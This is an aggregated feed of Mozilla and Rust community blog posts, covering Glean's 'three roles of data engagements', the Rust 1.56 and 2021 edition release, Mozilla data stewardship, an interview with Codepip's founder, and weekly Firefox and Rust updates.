Data@MozillaThis Week in Glean: The Three Roles of Data Engagements

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All “This Week in Glean” blog posts are listed in the TWiG index).

I’ve just recently started my sixth year working at Mozilla on data and data-adjacent things. In those years I’ve started to notice some patterns in how data is approached, so I thought I’d set them down in a TWiG because Glean’s got a role to play in them.

Data Engagements

A Data Engagement is when there’s a question that needs to engage with data to be answered. Something like “How many bookmarks are used by Firefox users?”.

(No one calls these Data Engagements but me, and I only do because I need to call them _something_.)

I’ve noticed three roles in Data Engagements at Mozilla:

  1. Data Consumer: The Question-Asker. The Temperature-Taker. This is the one who knows what questions are important, and is frustrated without an answer until and unless data can be collected and analysed to provide it. “We need to know how many bookmarks are used to see if we should invest more in bookmark R&D.”
  2. Data Analyst: The Answer-Maker. The Stats-Cruncher. This is the one who can use Data to answer a Consumer’s Question. “Bookmarks are used by Canadians more than Mexicans most of the time, but only amongst profiles that have at least one bookmark.”
  3. Data Instrumentor: The Data-Digger. The Code-Implementor. This one can sift through product code and find the correct place to collect the right piece of data. “The Places database holds many things, we’ll need to filter for just bookmarks to count them.”

This image has an empty alt attribute; its file name is fFe-UchE_Xy3d1LhX0shV41TJeABBBxJZigDH9_HXKAhu-m0JaM9fhfS8PQvW2WknXlMfk8lSIheZ-YMtT-NaQcLfdLYZnHC_f3LCkAIb-yYN0qWVvi0UPjQnz9C77sX5r0VLbsR=s1600

(diagrams courtesy of :brizental)

It’s through these three working in concert — The Consumer having a question that the Instrumentor instruments to generate data the Analyst can analyse to return an answer back to the Consumer — that a Data Engagement succeeds.

At Mozilla, Data Engagements succeed very frequently in certain circumstances. The Graphics team answers many deeply-technical questions about Firefox running in the wild to determine how well WebRender is working. The Telemetry team examines the health of the data collection system as a whole. Mike Conley’s old Tab Switcher Dashboard helped find and solve performance regressions in (unsurprisingly) Tab Switching. These go well, and there’s a common thread here that I think is the secret of why:

In these and the other high-success-rate Data Engagements, all three roles (Consumer, Analyst, and Instrumentor) are embodied by the same person.

This image has an empty alt attribute; its file name is laonFTnKBH6lmRWFRhcjUGx2aTG8iZbf3Wp99ulVqsu5J4qwZuq2pRaJ9WtBoXTEeAeDtui1yFn2gqMxxoFFZ1F87pLUXgmsymS9alcMqH0QBD7mz1bsTINN5FuVW1s9L0KSew8j=s1600

It’s a common problem in the industry. It’s hard to build anything at all, but it’s least hard to build something for yourself. When you are in yourself the Question-Asker, Answer-Maker, and Data-Digger, you don’t often mistakenly dig the wrong data to create an answer that isn’t to the question you had in mind. And when you accidentally do make a mistake (because, remember, this is hard), you can go back in and change the instrumentation, update the analysis, or reword the question.

But when these three roles are in different parts of the org, or different parts of the planet, things get harder. Each role is now trying to speak the others’ languages and infer enough context to do their jobs independently.

In comes the Data Org at Mozilla which has had great successes to date on the theme of “Making it easier for anyone to be their own Analyst”. Data Democratization. When you’re your own Analyst, then there’s fewer situations when the roles are disparate: Instrumentors who are their own Analysts know when data won’t be the right shape to answer their own questions and Consumers who are their own Analysts know when their questions aren’t well-formed.

Unfortunately we haven’t had as much success in making the other roles more accessible. Everyone can theoretically be their own Consumer: curiosity in a data-rich environment is as common as lanyards at an industry conference[1]. Asking _good_ questions is hard, though. Possible, but hard. You could just about imagine someone in a mature data organization becoming able to tell the difference between questions that are important and questions that are just interesting through self-serve tooling and documentation.

As for being your own Instrumentor… that is something that only a small fraction of folks have the patience to do. I (and Mozilla’s Community Managers) welcome you to try: it is possible to download and build Firefox yourself. It’s possible to find out which part of the codebase controls which pieces of UI. It’s… well, it’s more than possible, it’s actually quite pleasant to add instrumentation using Glean… but on the whole, if you are someone who _can_ Instrument Firefox Desktop you probably already have a copy of the source code on your hard drive. If you check right now and it’s not there, then there’s precious little likelihood that will change.

(Unless you come and work for Mozilla, that is.)

So let’s assume for now that democratizing instrumentation is impossible. Why does it matter? Why should it matter that the Consumer is a separate person from the Instrumentor?

Communication

Each role communicates with each other role with a different language:

  • Consumers talk to Instrumentors and Analysts in units of Questions and Answers. “How many bookmarks are there? We need to know whether people are using bookmarks.”
  • Analysts speak Data, Metadata, and Stats. “The median number of bookmarks is, according to a representative sample of Firefox profiles, twelve (confidence interval 99.5%).”
  • Instrumentors speak Data and Code. “There’s a few ways we delete bookmarks, we should cover them all to make sure the count’s correct when the next ping’s sent”

Some more of the Data Org and Mozilla’s greatest successes involve supplying context at the points in a Data Engagement where they’re most needed. We’ve gotten exceedingly good at loading context about data (metadata) to facilitate communication between Instrumentors and Analysts with tools like Glean Dictionary.

Ah, but once again the weak link appears to be the communication of Questions and Answers between Consumers and Instrumentors. Taking the above example, does the number of bookmarks include folders?

The Consumer knows, but the further away they sit from the Instrumentor, the less likely that the data coming from the product and fueling the analysis will be the “correct” one.

(Either including or excluding folders would be “correct” for different cases. Which one do you think was “more correct”?)

So how do we improve this?

Glean

Well, actually, Glean doesn’t have a solution for this. I don’t actually know what the solutions are. I have some ideas. Maybe we should share more context between Consumers and Instrumentors somehow. Maybe we should formalize the act of question-asking. Maybe we should build into the Glean SDK a high-enough level of metric abstraction that instead of asking questions, Consumers learn to speak a language of metrics.

The one thing I do know is that Glean is absolutely necessary to making any of these solutions possible. Without Glean, we have too many systems that are fractally complex for any context to be relevantly shared. How can we talk about sharing context about bookmark counts when we aren’t even counting things consistently[2]?

Glean brings that consistency. And from there we get to start solving these problems.

Expect me to come back to this realm of Engagements and the Three Roles in future posts. I’ve been thinking about:

  • how tooling affects the languages the roles speak amongst themselves and between each other,
  • how the roles are distributed on the org chart,
  • which teams support each role,
  • how Data Stewardship makes communication easier by adding context and formality,
  • how Telemetry and Glean handle the same situations in different ways, and
  • what roles Users play in all this. No model about data is complete without considering where the data comes from.

I’m not sure how many I’ll actually get to, but at least I have ideas.

:chutten

[1] Other rejected similes include “as common as”: maple syrup on Canadian breakfast tables, frustration in traffic, sense isn’t.

[2] Counting is harder than it looks.

(( This post is a syndicated copy of the original. ))

Chris H-CThis Week in Glean: The Three Roles of Data Engagements

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All “This Week in Glean” blog posts are listed in the TWiG index).

I’ve just recently started my sixth year working at Mozilla on data and data-adjacent things. In those years I’ve started to notice some patterns in how data is approached, so I thought I’d set them down in a TWiG because Glean’s got a role to play in them.

Data Engagements

A Data Engagement is when there’s a question that needs to engage with data to be answered. Something like “How many bookmarks are used by Firefox users?”.

(No one calls these Data Engagements but me, and I only do because I need to call them _something_.)

I’ve noticed three roles in Data Engagements at Mozilla:

  1. Data Consumer: The Question-Asker. The Temperature-Taker. This is the one who knows what questions are important, and is frustrated without an answer until and unless data can be collected and analysed to provide it. “We need to know how many bookmarks are used to see if we should invest more in bookmark R&D.”
  2. Data Analyst: The Answer-Maker. The Stats-Cruncher. This is the one who can use Data to answer a Consumer’s Question. “Bookmarks are used by Canadians more than Mexicans most of the time, but only amongst profiles that have at least one bookmark.”
  3. Data Instrumentor: The Data-Digger. The Code-Implementor. This one can sift through product code and find the correct place to collect the right piece of data. “The Places database holds many things, we’ll need to filter for just bookmarks to count them.”

(diagrams courtesy of :brizental)

It’s through these three working in concert — The Consumer having a question that the Instrumentor instruments to generate data the Analyst can analyse to return an answer back to the Consumer — that a Data Engagement succeeds.

At Mozilla, Data Engagements succeed very frequently in certain circumstances. The Graphics team answers many deeply-technical questions about Firefox running in the wild to determine how well WebRender is working. The Telemetry team examines the health of the data collection system as a whole. Mike Conley’s old Tab Switcher Dashboard helped find and solve performance regressions in (unsurprisingly) Tab Switching. These go well, and there’s a common thread here that I think is the secret of why: 

In these and the other high-success-rate Data Engagements, all three roles (Consumer, Analyst, and Instrumentor) are embodied by the same person.

It’s a common problem in the industry. It’s hard to build anything at all, but it’s least hard to build something for yourself. When you are in yourself the Question-Asker, Answer-Maker, and Data-Digger, you don’t often mistakenly dig the wrong data to create an answer that isn’t to the question you had in mind. And when you accidentally do make a mistake (because, remember, this is hard), you can go back in and change the instrumentation, update the analysis, or reword the question.

But when these three roles are in different parts of the org, or different parts of the planet, things get harder. Each role is now trying to speak the others’ languages and infer enough context to do their jobs independently.

In comes the Data Org at Mozilla which has had great successes to date on the theme of “Making it easier for anyone to be their own Analyst”. Data Democratization. When you’re your own Analyst, then there’s fewer situations when the roles are disparate: Instrumentors who are their own Analysts know when data won’t be the right shape to answer their own questions and Consumers who are their own Analysts know when their questions aren’t well-formed.

Unfortunately we haven’t had as much success in making the other roles more accessible. Everyone can theoretically be their own Consumer: curiosity in a data-rich environment is as common as lanyards at an industry conference[1]. Asking _good_ questions is hard, though. Possible, but hard. You could just about imagine someone in a mature data organization becoming able to tell the difference between questions that are important and questions that are just interesting through self-serve tooling and documentation.

As for being your own Instrumentor… that is something that only a small fraction of folks have the patience to do. I (and Mozilla’s Community Managers) welcome you to try: it is possible to download and build Firefox yourself. It’s possible to find out which part of the codebase controls which pieces of UI. It’s… well, it’s more than possible, it’s actually quite pleasant to add instrumentation using Glean… but on the whole, if you are someone who _can_ Instrument Firefox Desktop you probably already have a copy of the source code on your hard drive. If you check right now and it’s not there, then there’s precious little likelihood that will change.

(Unless you come and work for Mozilla, that is.)

So let’s assume for now that democratizing instrumentation is impossible. Why does it matter? Why should it matter that the Consumer is a separate person from the Instrumentor?

Communication

Each role communicates with each other role with a different language:

  • Consumers talk to Instrumentors and Analysts in units of Questions and Answers. “How many bookmarks are there? We need to know whether people are using bookmarks.”
  • Analysts speak Data, Metadata, and Stats. “The median number of bookmarks is, according to a representative sample of Firefox profiles, twelve (confidence interval 99.5%).”
  • Instrumentors speak Data and Code. “There’s a few ways we delete bookmarks, we should cover them all to make sure the count’s correct when the next ping’s sent”

Some more of the Data Org and Mozilla’s greatest successes involve supplying context at the points in a Data Engagement where they’re most needed. We’ve gotten exceedingly good at loading context about data (metadata) to facilitate communication between Instrumentors and Analysts with tools like Glean Dictionary.

Ah, but once again the weak link appears to be the communication of Questions and Answers between Consumers and Instrumentors. Taking the above example, does the number of bookmarks include folders?

The Consumer knows, but the further away they sit from the Instrumentor, the less likely that the data coming from the product and fueling the analysis will be the “correct” one.

(Either including or excluding folders would be “correct” for different cases. Which one do you think was “more correct”?)

So how do we improve this?

Glean

Well, actually, Glean doesn’t have a solution for this. I don’t actually know what the solutions are. I have some ideas. Maybe we should share more context between Consumers and Instrumentors somehow. Maybe we should formalize the act of question-asking. Maybe we should build into the Glean SDK a high-enough level of metric abstraction that instead of asking questions, Consumers learn to speak a language of metrics.

The one thing I do know is that Glean is absolutely necessary to making any of these solutions possible. Without Glean, we have too many systems that are fractally complex for any context to be relevantly shared. How can we talk about sharing context about bookmark counts when we aren’t even counting things consistently[2]?

Glean brings that consistency. And from there we get to start solving these problems.

Expect me to come back to this realm of Engagements and the Three Roles in future posts. I’ve been thinking about:

  • how tooling affects the languages the roles speak amongst themselves and between each other,
  • how the roles are distributed on the org chart,
  • which teams support each role,
  • how Data Stewardship makes communication easier by adding context and formality,
  • how Telemetry and Glean handle the same situations in different ways, and
  • what roles Users play in all this. No model about data is complete without considering where the data comes from.

I’m not sure how many I’ll actually get to, but at least I have ideas.

:chutten

[1] Other rejected similes include “as common as”: maple syrup on Canadian breakfast tables, frustration in traffic, sense isn’t.

[2] Counting is harder than it looks.

Firefox NightlyThese Weeks in Firefox: Issue 102

Highlights

Friends of the Firefox team
Fixed more than one bug

  • Itiel

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons

  • Fixed a bug related to the addon descriptions not being localized as expected when switching the browser to a different locale – Bug 1712024
  • Introduced a new “extensions.logging.productaddons.level” about:config pref to control log level related to GMP updates independently from the general AddonManager/XPIProvider logging level – Bug 1733670  

WebExtensions Framework

WebExtension APIs

  • Starting from Firefox 94, a new partitionKey property is being introduced in the cookies API, this new property is meant to help extensions to better handle cookies partitioned by the dFPI feature

Downloads Panel

  • Many tests being addressed and fixed with improvements pref enabled (ticket)
  • [kpatenio] New context menu item being worked on for new pref (ticket)

Fission

  • The Fission experiment on Release has concluded, and the data science team is now analyzing the data. So far, nothing has jumped out to us showing stability or performance issues.
  • Barring any serious issues in the data analysis, the plan is to slowly rollout Fission to more release channel users in subsequent releases.

Fluent

Password Manager 

Performance

  • dthayer landed a fix that improves scaling of iframes with Fission enabled
  • mconley helped harry find a solution for a white flash that can occur when a theme is applied to about:home during the first boot
  • Special shout-out to zombie from the WebExtensions team for helping to reduce Base Content JS memory usage by 3-4% on all desktop platforms!
  • We’re starting to get numbers back on how the Fluent migrations have been impacting startup:
    • There appears to be evidence that the localization cycle for the first window is ~32% faster for the 95th percentile of users on Nightly, and ~12% faster for the 75th percentile.
    • Subsequent new windows see localization cycle improvements of ~12% for the 95th percentile
    • TL;DR: Removing DTDs from the main windows has improved startup time and new window opening for some of the slowest machines in our user pool.

Performance Tools

  • Isolated web content processes now display eTLD+1 of their origin in the Firefox Profiler timeline when Fission is enabled.
Before Fission was enabled, web content processes did not display their origin in the Firefox Profiler..

Before

After Fission is enabled, users can now see the origin of web content processes in the Firefox Profiler.

After

  • Gecko profiler Rust marker API has landed. It’s possible to add a profiler marker from the Rust to annotate a part of the code now. See the gecko-profiler crate for more information. Documentation is also coming soon.

Search and Navigation

  • Daisuke has replaced the DDG icon with one having better quality. Bug 1731538 
  • Thanks to Antonin Loubiere for contributing a patch to make ESC actually undo changes in the separate search bar, instead of doing nothing, more similarly to how the address bar behaves. Bug 350079 

Screenshots

  • Thanks again to module owner Emma whose last day was Friday. Sam Foster will take over as module owner. 
  • niklas working on bug 1714234 that fixes screenshot test issues when copying image to clipboard.

The Rust Programming Language BlogAnnouncing Rust 1.56.0 and Rust 2021

The Rust team is happy to announce a new version of Rust, 1.56.0. This stabilizes the 2021 edition as well. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, getting Rust 1.56.0 is as easy as:

rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.56.0 on GitHub.

What's in 1.56.0 stable

Rust 2021

We wrote about plans for the Rust 2021 Edition in May. Editions are a mechanism for opt-in changes that may otherwise pose backwards compatibility risk. See the edition guide for details on how this is achieved. This is a smaller edition, especially compared to 2018, but there are still some nice quality-of-life changes that require an edition opt-in to avoid breaking some corner cases in existing code. See the new chapters of the edition guide below for more details on each new feature and guidance for migration.

Disjoint capture in closures

Closures automatically capture values or references to identifiers that are used in the body, but before 2021, they were always captured as a whole. The new disjoint-capture feature will likely simplify the way you write closures, so let's look at a quick example:

// 2015 or 2018 edition code
let a = SomeStruct::new();

// Move out of one field of the struct
drop(a.x);

// Ok: Still use another field of the struct
println!("{}", a.y);

// Error: Before 2021 edition, tries to capture all of `a`
let c = || println!("{}", a.y);
c();

To fix this, you would have had to extract something like let y = &a.y; manually before the closure to limit its capture. Starting in Rust 2021, closures will automatically capture only the fields that they use, so the above example will compile fine!

This new behavior is only activated in the new edition, since it can change the order in which fields are dropped. As for all edition changes, an automatic migration is available, which will update your closures for which this matters by inserting let _ = &a; inside the closure to force the entire struct to be captured as before.

Migrating to 2021

The guide includes migration instructions for all new features, and in general transitioning an existing project to a new edition. In many cases cargo fix can automate the necessary changes. You may even find that no changes in your code are needed at all for 2021!

However small this edition appears on the surface, it's still the product of a lot of hard work from many contributors: see our dedicated celebration and thanks tracker!

Cargo rust-version

Cargo.toml now supports a [package] rust-version field to specify the minimum supported Rust version for a crate, and Cargo will exit with an early error if that is not satisfied. This doesn't currently influence the dependency resolver, but the idea is to catch compatibility problems before they turn into cryptic compiler errors.

New bindings in binding @ pattern

Rust pattern matching can be written with a single identifier that binds the entire value, followed by @ and a more refined structural pattern, but this has not allowed additional bindings in that pattern -- until now!

struct Matrix {
    data: Vec<f64>,
    row_len: usize,
}

// Before, we need separate statements to bind
// the whole struct and also read its parts.
let matrix = get_matrix();
let row_len = matrix.row_len;
// or with a destructuring pattern:
let Matrix { row_len, .. } = matrix;

// Rust 1.56 now lets you bind both at once!
let matrix @ Matrix { row_len, .. } = get_matrix();

This actually was allowed in the days before Rust 1.0, but that was removed due to known unsoundness at the time. With the evolution of the borrow checker since that time, and with heavy testing, the compiler team determined that this was safe to finally allow in stable Rust!

Stabilized APIs

The following methods and trait implementations were stabilized.

The following previously stable functions are now const.

Other changes

There are other changes in the Rust 1.56.0 release: check out what changed in Rust, Cargo, and Clippy.

Contributors to 1.56.0

Many people came together to create Rust 1.56.0 and the 2021 edition. We couldn't have done it without all of you. Thanks!

Mark SurmanExploring better data stewardship at Mozilla

Over the last few years, Mozilla has increasingly turned its attention to the question of ‘how we build more trustworthy AI?’ Data is at the core of this question. Who has our data? What are they using it for? Do they have my interests in mind, or only their own? Do I trust them?

We decided earlier this year that ‘better data stewardship’ should be one of the three big areas of focus for our trustworthy AI work.

One part of this focus is supporting the growing field of people working on data trusts, data cooperatives and other efforts to build trust and shift power dynamics around data. In partnership with Luminate and Siegel, we launched the Mozilla Data Futures Lab in March as a way to drive this part of the work.

At the same time, we have started to ask ourselves: how might Mozilla itself explore and use some of these new models of responsible data governance? We have long championed more responsible use of data, with everything we do living up to the Mozilla Lean Data Practices. The question is: are there ways we can go further? Are there ways we can more actively engage with people around their data that builds trust — and that helps the tech industry shift the way it thinks about and uses data?

This post includes some early learning on these questions. The TLDR: 1. the list of possible experiments is compelling — and vast; and 2. we should start small, looking at how emerging data governance models might apply to areas where we already use data in our products and programs.

Digging into more detail: we started looking at these questions in 2020 by asking two leading experts — Sarah Gold from Projects by IF and Sean McDonald from Digital Public — to generate hypothetical scenarios where Mozilla deployed radically new approaches to data governance. These scenarios included three big ideas:

  • Collective Rights Representation: Mozilla could represent the data rights of citizens collectively, effectively forming a ‘data union’. This could include negotiating better terms of service or product improvements, or enforcing rights held under regimes like GDPR or CCPA.
  • Data Donation Trust: As Mozilla projects like Rally, Regrets Reporter and Common Voice demonstrate, there can be great power in citizens coming together to donate and aggregate their data. We could take these platforms further by creating a data trust or coop to actively steward and create collective value from this data over time.
  • Consent Management via a Privacy Assistant: a digital assistant powered by a data trust could mediate between citizens and tech companies, handling real time ‘negotiations’ about how their data is used. This would give users more control — and ultimately more leverage over how individuals and companies manage data.

Other scenarios included Mozilla as a consumer steward, creating and building an advocacy infrastructure platform, or managing an industry association. Sarah and Sean have each written up their work and shared in these blog posts: Bringing better data stewardship to life; and A Couch-to-5K Plan for Digital Governance.

This reflective process was at once exciting and sobering. The ideas are compelling — and include things we might do one day (and that we’re even doing now in small ways). But, by their nature, they are without context, leadership or products. Reading these scenarios, the path from a ‘big data governance idea’ to something real in the world wasn’t at all clear to us.

As Sean pointed out in his post: “There isn’t ‘a’ way to design data governance – as a system or as a commercial offering. Beyond this point, the process relies a lot on context, and the unique value a person or organization brings to a process.”

For me, this was really the key ‘aha’ (even though it should have been obvious). We need to start from the places where we have data and context and leaders — not from big ideas. With this in mind, Mozilla Foundation Data Lead, Jackie Lu, and Data Futures Lab Lead, Champika Fernando have offered to take over this internal exploration by identifying practical ways Mozilla can improve the ways we collect and use data today.

They will begin this work later this year with a review of data governance practices and open questions within Mozilla Foundation, where our trustworthy AI work is housed. This will include a look at data-centric projects like Common Voice and YouTube Regrets Reporter as well as programs like online campaigning and MozFest that rely heavily on the Foundation’s CRM. This work explores questions like: what would it look like for Mozilla Foundation to more fully “walk the talk” when it comes to data stewardship? And, what kind of processes might we need to put in place, to have our own organization’s use of data be a learning opportunity for how we shift power back to people, and imagine new ways to act collectively through, and with, our data? They are starting to explore those questions and more.

In parallel, the Data Futures Lab and Mozilla’s Insights team will be working on a Legal and Policy Playbook for Builders outlining existing regulatory opportunities that can be leveraged for experimentation across the field in various jurisdictions. While the primary audience of this work is external, we will also look at whether there are ways to apply these practices to the Mozilla Foundation’s work internally.

Personally, I believe that new models of responsible data governance have huge potential to shift technology, society and our economy — much like open source and the open web shifted things 20 years ago. I also think that the path to this shift will be driven by people who just start building things differently, inventing new models and shifting power as they go. I’m hoping that looking at new, more responsible ways to steward data everyday will set Mozilla up to again play a significant role in this kind of innovation and change.

This is part one of a four-part series on how we approach data at Mozilla. Read the others here: Part 2; Part 3; Part 4.

The post Exploring better data stewardship at Mozilla appeared first on Mark Surman.

Hacks.Mozilla.OrgHacks Decoded: Thomas Park, Founder of Codepip

Welcome to our Hacks: Decoded Interview series!

Once a month, Mozilla Foundation’s Xavier Harding speaks with people in the tech industry about where they’re from, the work they do and what drives them to keep going forward. Make sure you follow Mozilla’s Hacks blog to find more articles in this series and make sure to visit the Mozilla Foundation site to see more of our org’s work. 

Meet Thomas Park 

Thomas Park is a software developer based in the U.S. (Philadelphia, specifically). Previously, he was a teacher and researcher at Drexel University and even worked at Mozilla Foundation for a stint. Now, he’s the founder of Codepip, a platform that offers games that teach players how to code. Park has made a couple games himself: Flexbox Froggy and Grid Garden.

We spoke with Thomas over email about coding, his favourite apps and his past life at Mozilla. Check it out below and welcome to Hacks: Decoded.

Where’d you get your start, Thomas? How did you end up working in tech, what was the first piece of code you wrote, what’s the Thomas Park origin story?

The very first piece of code I wrote was in elementary school. We were introduced to Logo, an educational programming language that was used to draw graphics with a turtle (a little cursor that was shaped like the animal). I drew a rudimentary weapon that shot an animated laser beam, with the word “LAZER” misspelled under it.

Afterwards, I took an extremely long hiatus from coding. Dabbled with HyperCard and HTML here and there, but didn’t pick it up in earnest until college.

Post-college, I worked in the distance education department at the Center for Talented Youth at Johns Hopkins University, designing and teaching online courses. It was there I realized how much the technology we used mediated the experience of our students. I also realized how much better the design of this tech should be. That motivated me to go to grad school to study human-computer interaction, with a focus on educational technology. I wrote a decent amount of code to build prototypes and analyze data during my time there.

What is Codepip? What made you want to create it? 

Codepip is a platform I created for coding games that help people learn HTML, CSS, JavaScript, etc. The most popular game is Flexbox Froggy.

Codepip actually has its roots in Mozilla. During grad school, I did an internship with the Mozilla Foundation. At the time, they had a code editor geared toward teachers and students called Thimble. For my internship, I worked with Mozilla employees to integrate a tutorial feature into Thimble.

Anyway, through this internship I got to attend Mozilla Festival. And there I met many people who did brilliant work inside and outside of Mozilla. One was an extremely talented designer named Luke Pacholski. By that time, he had created CSS Diner, a game about CSS selectors. And we got to chatting about other game ideas.

After I returned from MozFest, I worked weekends for about a month to create Flexbox Froggy. I was blown away by the reception, from both beginners who wanted to learn CSS, to more experienced devs curious about this powerful new CSS module called flexbox. To me, this affirmed that coding games could make a good complement to more traditional ways of learning. Since then, I’ve made other games that touch on CSS grid, JS math, HTML shortcuts with Emmet, and more.

Gamified online learning has become quite popular in the past couple of years, what are some old school methods that you still recommend and use?

Consulting the docs, if you can call that old school. I often visit the MDN Web Docs to learn some aspect of CSS or JS. The articles are detailed, with plenty of examples.

On occasion I find myself doing a deep dive into the W3C standards, though navigating the site can be tricky.

Same goes for any third-party library or framework you’re working with — read the docs!

What’s one thing you wish you knew when you first started to code?

I wish I knew git when I first started to code. Actually, I wish I knew git now.

It’s never too early to start version controlling your projects. Sign up for a free GitHub account, install GitHub’s client or learn a handful of basic git commands, and backup your code. You can opt for your code to be public if you’re comfortable with it, private if not. There’s no excuse.

Plus, years down the line when you’ve mastered your craft, you can get some entertainment value from looking back at your old code.

Whose work do you admire right now? Who should more people be paying attention to?

I’m curious how other people answer this. I feel like I’m out of the loop on this one.

But since you asked, I will say that when it comes to web design with high stakes, the teams at Stripe and Apple have been the gold standard for years. I’ll browse their sites and get inspired by the many small, almost imperceptible details that add up to something magical. Or something in your face that blows my mind.

On a more personal front, there’s the art of Diana Smith and Ben Evans, which pushes the boundaries of what’s possible with pure CSS. I love how Lynn Fisher commits to weird side projects. And I admire the approachability of Josh Comeau’s writings on technical subjects.

What’s a part of your journey that many may not realize when they look at your resume or LinkedIn page?

My resume tells a cohesive story that connects the dots of my education and employment. As if there was a master plan that guided me to where I am.

The truth is I never had it all figured out. I tried some things I enjoyed, tried other things which I learned I did not, and discovered whole new industries that I didn’t even realize existed. On the whole, the journey has been rewarding, and I feel fortunate to be doing work right now that I love and feel passionate about. But that took time and is subject to change.

Some beginners may feel discouraged that they don’t have their career mapped out from A to Z, like everyone else seemingly does. But all of us are on our own journeys of self-discovery, even if the picture we paint for prospective employers, or family and friends, is one of a singular path.

What’s something you’ve realized since we’ve been in this pandemic? Tech-related or otherwise?

Outside of tech, I’ve realized how grateful I am for all the healthcare workers, teachers, caretakers, sanitation workers, and food service workers who put themselves at risk to keep things going. At times I got a glimpse of what happens without them and it wasn’t pretty.

Tech-related, the pandemic has accelerated a lot of tech trends by years or even decades. Not everything is as stark as, say, Blockbuster getting replaced by Netflix, but industries are irreversibly changing and new technology is making that happen. It really underscores how in order to survive and flourish, we as tech workers have to always be ready to learn and adapt in a fast-changing world.

Okay a random one — you’re stranded on a desert island with nothing but a smartphone. Which three apps could you not live without?

Assuming I’ll be stuck there for a while, I’d definitely need my podcasts. My podcast app of choice has long been Overcast. I’d load it up with some 99% Invisible and Planet Money. Although I’d probably only need a single episode of Hardcore History to last me before I got rescued.

I’d also have Simplenote for all my note-taking needs. When it comes to notes, I prefer the minimalist, low-friction approach of Simplenote to manage my to-dos and projects. Or count days and nights in this case.

Assuming I have bars, my last app is Reddit. The larger subs get most of the attention, but there are plenty of smaller ones with strong communities and thoughtful discussion. Just avoid the financial investing advice from there.

Last question — what’s next for you?

I’m putting the finishing touches on a new coding game called Disarray. You play a cleaning expert who organizes arrays of household objects using JavaScript methods like push, sort, splice, and map, sparking joy in the homeowner.

And planning for a sequel. Maybe a game about databases…

Thomas Park is a software developer living in Philly. You can keep up with his work right here and keep up with Mozilla on Twitter and Instagram. Tune into future articles in the Hacks: Decoded series on this very blog.

The post Hacks Decoded: Thomas Park, Founder of Codepip appeared first on Mozilla Hacks - the Web developer blog.

This Week In RustThis Week in Rust 413

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Foundation
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is serde_with, a crate of helper macros to ease implementing serde traits for your types.

Thanks to piegames for the suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from the Rust Project

353 pull requests were merged in the last week

Rust Compiler Performance Triage

A week where improvements outweigh regressions. The highlight of the week is the change to split out LLVM profile guided optimization (PGO) and using clang 13 to compile LLVM which led to improvements in many real world crates (e.g., cargo) in the range of 10%. Most regressions were limited and at most in the less than 1% range. We are seeing more performance changes in rollups which are supposed to be performance neutral. We'll have to decide how to best address this.

Triage done by @rylev. Revision range: 9475e609..d45ed750

3 Regressions, 4 Improvements, 2 Mixed; 2 of them in rollups; 34 comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
New RFCs

Upcoming Events

Online

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Modeldrive

Connected Cars

Bytewax

Timescale

Immunant

Nexthink

Kraken

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

The biggest failure in Rust‘s communication strategy has been the inability to explain to non-experts that unsafe abstractions are the point, not a sign of failure.

withoutboats on twitter

Thanks to Alice Ryhl for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Chris H-CSix-Year Moziversary

I’ve been working at Mozilla for six years today. Wow.

Okay, so what’s happened… I’ve been promoted to Staff Software Engineer. Georg and I’d been working on that before he left, and then, well *gestures at everything*. This means it doesn’t really _feel_ that different to be a Staff instead of a Senior since I’ve been operating at the latter level for over a year now, but the it’s nice that the title caught up. Next stop: well, actually, I think Staff’s a good place for now.

Firefox On Glean did indeed take my entire 2020 at work, and did complete on time and on budget. Glean is now available to be used in Firefox Desktop.

My efforts towards getting folks to actually _use_ Glean instead of Firefox Telemetry in Firefox Desktop have been mixed. The Background Update Task work went exceedingly well… but when there’s 2k pieces of instrumentation, you need project management and I’m trying my best. Now to “just” get buy-in from the powers that be.

I delivered a talk to Ubisoft (yeah, the video game folks) earlier this year. That was a blast and I’m low-key looking for another opportunity like it. If you know anyone who’d like me to talk their ears off about Data and Responsibility, do let me know.

Blogging’s still low-frequency. I rely on the This Week in Glean rotation to give me the kick to actually write long-form ideas down from time-to-time… but it’s infrequent. Look forward to an upcoming blog post about the Three Roles in Data Engagements.

Predictions for the future time:

  • There will be at least one Work Week planned if not executed by this time next year. Vaccines work.
  • Firefox Desktop will have at least started migrating its instrumentation to Glean.
  • I will still be spending a good chunk of my time coding, though I expect this trend of spending ever more time writing proposals and helping folks on chat will continue.

And that’s it for me for now.

:chutten

The Mozilla BlogWelcome Imo Udom, Mozilla’s new Senior Vice President, Innovation Ecosystems

I am delighted to share that Imo Udom has joined Mozilla as Senior Vice President, Innovation Ecosystems. Imo brings a unique combination of strategy, technical and product expertise and an entrepreneurial spirit to Mozilla and our work to design, develop and deliver new products and services. 

